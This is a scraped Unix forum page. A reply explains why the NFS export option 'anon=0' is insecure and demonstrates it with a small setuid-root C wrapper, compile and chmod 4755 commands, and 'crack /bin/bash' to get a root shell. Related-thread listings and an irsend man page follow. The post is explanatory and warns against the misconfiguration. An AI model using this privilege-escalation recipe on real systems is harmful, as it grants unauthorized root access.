Login or Register to Ask a Question and Join Our Community

Sponsored Content
Full Discussion: Unable to write to a mounted NFS share
Top Forums UNIX for Dummies Questions & Answers Unable to write to a mounted NFS share Post 302917257 by achenle on Monday 15th of September 2014 01:53:16 PM
Old 09-15-2014
Using "anon=0" is about as dangerous to security as you can possibly imagine.

What "anon=0" means is, "If I don't know who you are, I'm giving you root permissions in the file system." If you need to do THAT, something is badly broken in your configuration. BADLY BROKEN.

Create this file in that NFS file system on an NFS client as a user that's not recognized by the NFS server:
crack.c:
Code:
#include <unistd.h>
int main( int argc, char **argv )
{
    setuid( 0 );
    seteuid( 0 );
    setgid( 0 );
    setegid( 0 );
    execv( argv[ 1 ], argv + 1 );
}

Now run these commands:
Code:
cc crack.c -o crack
chmod 4755 crack

Then run something like this from any host mounting that file system - as any user - whether it's mounted natively or via NFS:
Code:
crack /bin/bash

Instant root shell, goodbye security.
 

10 More Discussions You Might Find Interesting

1. AIX

Unable to mount NFS share during boot

Hello Everyone, I have a pseries machine running AIX 4.3.3 that has an invalid IP in /etc/hosts. During a boot the system hangs because it's trying to mount an NFS share to this invalid IP. I've tried to boot the system from a mksysb (not sure if the device was defined as rmt0) and AIX CD... (0 Replies)
Discussion started by: jlslhills
0 Replies

2. Shell Programming and Scripting

Apache/CGI Bin Accessing mounted SMB share

Hey Guys, I need to copy some files from my Apache server to SMB share ... copy $file,"/Volumes/v1/x/test/$datestamp$name$suffix" Unfortunately this command when executed from Apache/cgi-bin is not able to access mounted volumes .. is there anything that can be done about that ... Can... (1 Reply)
Discussion started by: NDxiak
1 Replies

3. Solaris

how to make nas share mounted in zones persistent across reboots?

there are few nas shares that would be mounted on the local zone. should i add an entry into the add an entry in zone.xml file so that it gets mounted automatically when the zone gets rebooted? or whats the correct way to get it mounted automatically when the zone reboots (2 Replies)
Discussion started by: chidori
2 Replies

4. AIX

I/O speed to CIFS mounted Windows Share

I have an AIX box that mounts a Windows share across subnets. When I try to copy a 100 MB file to it, it copies around 2 MB/s. If I copy to another Windows share on the same subnet it copies around 12 MB/s. All I have is gigabit networks so I would expect it to go well over 12 MB/s, which is the... (8 Replies)
Discussion started by: kah00na
8 Replies

5. UNIX for Dummies Questions & Answers

NFS mounted drive showing Write protected message

Hi We have two servers name A and B . I have a folder "Share" on A was NFS mounted to "B" server. I have set the ACL permissions using setfacl , so that both (One user from Server A and another user from Server B) users can read and write to the directory. Both users can create the... (0 Replies)
Discussion started by: rakeshkumar
0 Replies

6. Red Hat

Unable to access NFS share on Solaris Server from Linux client

Hi, I am trying to access a NFS shared directory on Solaris 10 Server from a client which is RHEL 4 Server. On the NFS Server, in /etc/dfs/, I added following line to dfstab file. share -F nfs -o rw /var/share & then ran the following svcadm -v enable -r... (3 Replies)
Discussion started by: SunilB2011
3 Replies

7. Shell Programming and Scripting

Mount NFS Share On NFS Client via bash script.

I need a help of good people with effective bash script to mount nfs shared, By the way I did the searches, since i haven't found that someone wrote a script like this in the past, I'm sure it will serve more people. The scenario as follow: An NFS Client with Daily CRON , running bash script... (4 Replies)
Discussion started by: Brian.t
4 Replies

8. HP-UX

Unable to write to NFS mounted directory

Hi, I have exported a few nfs mounts from one server to the nfs clients. This is my nfs server dfstab : # cat /etc/dfs/dfstab # place share(1M) commands here for automatic execution # on entering init state 3. # # share <pathname> # .e.g, # share -F... (3 Replies)
Discussion started by: anaigini45
3 Replies

9. IP Networking

Unable to search NFS Share

My customer has created a share on a Windows Server 2012 system and exported it as a NFS share. I can mount the share on a SCO system, but I only have read/write access. So I am unable to list the contents of the share. It is as if the directories had 0666 permissions. My customer says that this... (5 Replies)
Discussion started by: jgt
5 Replies

10. AIX

Unable to mount previously-working NFS share from NIM to LPAR

Right, now that I've finally worked out this website, I'll ask my question! I am having an absolute nightmare with NFS on AIX. I have used it many times, and I know what I'm doing, however I cannot fathom what is going on here. I have 2 LPARs, sitting on the same physical host. They are... (12 Replies)
Discussion started by: tmooredba
12 Replies

LEARN ABOUT DEBIAN

irsend

IRSEND(1)							   User Commands							 IRSEND(1)

NAME

       irsend - basic LIRC program to send infra-red commands

SYNOPSIS

       irsend [options] DIRECTIVE REMOTE CODE [CODE...]

DESCRIPTION

       Asks the lircd daemon to send one or more CIR (Consumer Infra-Red) commands. This is intended for remote control of electronic devices such
       as TV boxes, HiFi sets, etc.

       DIRECTIVE can be:
	  SEND_ONCE	    - send CODE [CODE ...] once
	  SEND_START	    - start repeating CODE
	  SEND_STOP	    - stop repeating CODE
	  LIST		    - list configured remote items
	  SET_TRANSMITTERS  - set transmitters NUM [NUM ...]
	  SIMULATE	    - simulate IR event

       REMOTE is the name of a remote, as described in the lircd configuration file.

       CODE is the name of a remote control key of REMOTE, as it appears in the lircd configuration file.

       NUM is the transmitter number of the hardware device.

       For the LIST DIRECTIVE, REMOTE and/or CODE can be empty:

	  LIST	 ""    ""   - list all configured remote names
	  LIST REMOTE  ""   - list all codes of REMOTE
	  LIST REMOTE CODE  - list only CODE of REMOTE

       The SIMULATE command only works if it has been explicitly enabled in lircd.

       -h --help
	      display usage summary

       -v --version
	      display version

       -d --device
	      use given lircd socket [/var/run/lirc/lircd]

       -a --address=host[:port]
	      connect to lircd at this address

       -# --count=n
	      send command n times

EXAMPLES

	  irsend LIST DenonTuner ""
	  irsend SEND_ONCE  DenonTuner PROG-SCAN
	  irsend SEND_ONCE  OnkyoAmpli VOL-UP VOL-UP VOL-UP VOL-UP
	  irsend SEND_START OnkyoAmpli VOL-DOWN ; sleep 3
	  irsend SEND_STOP  OnkyoAmpli VOL-DOWN
	  irsend SET_TRANSMITTERS 1
	  irsend SET_TRANSMITTERS 1 3 4
	  irsend SIMULATE "0000000000000476 00 OK TECHNISAT_ST3004S"

FILES

       /etc/lirc/lircd.conf
	      Default lircd configuration file.  It should contain all the remotes, their infra-red codes and the corresponding timing	and  wave-
	      form details.

DIAGNOSTICS

       If lircd is not running (or /var/run/lirc/lircd lacks write permissions) irsend aborts with the following diagnostics:
       "irsend: could not connect to socket"
       "irsend: Connection refused" (or "Permission denied").

SEE ALSO

       The documentation for lirc is maintained as html pages. They are located under html/ in the documentation directory.

       lircd(8), mode2(1), smode2(1), xmode2(1), irrecord(1), irw(1), http://www.lirc.org.

irsend 0.9.0-pre1						   October 2010 							 IRSEND(1)
All times are GMT -4. The time now is 09:53 AM.
Unix & Linux Forums Content Copyright 1993-2022. All Rights Reserved.
Privacy Policy